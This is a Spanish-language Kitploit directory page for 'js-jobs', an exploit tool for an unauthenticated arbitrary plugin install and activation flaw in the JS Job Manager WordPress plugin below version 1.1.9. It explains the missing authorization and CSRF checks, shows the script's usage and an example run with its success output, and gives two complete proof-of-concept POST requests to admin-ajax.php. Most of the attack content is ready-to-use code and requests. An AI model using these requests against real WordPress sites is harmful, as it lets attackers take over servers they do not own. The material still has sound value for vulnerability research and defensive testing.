Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
js-jobs — JS Job Manager < 1.1.9 - Instalación/Activación Arbitraria de Plugin No Autenticada | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/js-jobs
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubrandomrobbiebf/js-jobs

js-jobs

JS Job Manager < 1.1.9 - Instalación/Activación Arbitraria de Plugin No Autenticada

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

js-jobs

JS Job Manager < 1.1.9 - Instalación/Activación arbitraria de plugins sin autenticación

Descripción

La acción AJAX jsjobs_ajax del plugin, disponible tanto para usuarios autenticados como no autenticados, no tiene comprobaciones adecuadas de autorización y CSRF, en particular cuando se utilizan installPluginFromAjax y activatePluginFromAjax, lo que podría permitir a atacantes no autenticados instalar plugins arbitrarios desde el repositorio de WordPress y activarlos (con alguna limitación).

No hay control sobre la versión del plugin, por lo que se instalará la última versión del plugin.

Cómo usar

root@kitploit:~
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s

Ejemplo

root@kitploit:~
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.

Prueba de concepto

Para instalar un plugin:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug>

Para activar un plugin (hay una limitación aquí, ya que el plugin debe tener el archivo /.php, de lo contrario no se activará):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug> 
Descargar herramienta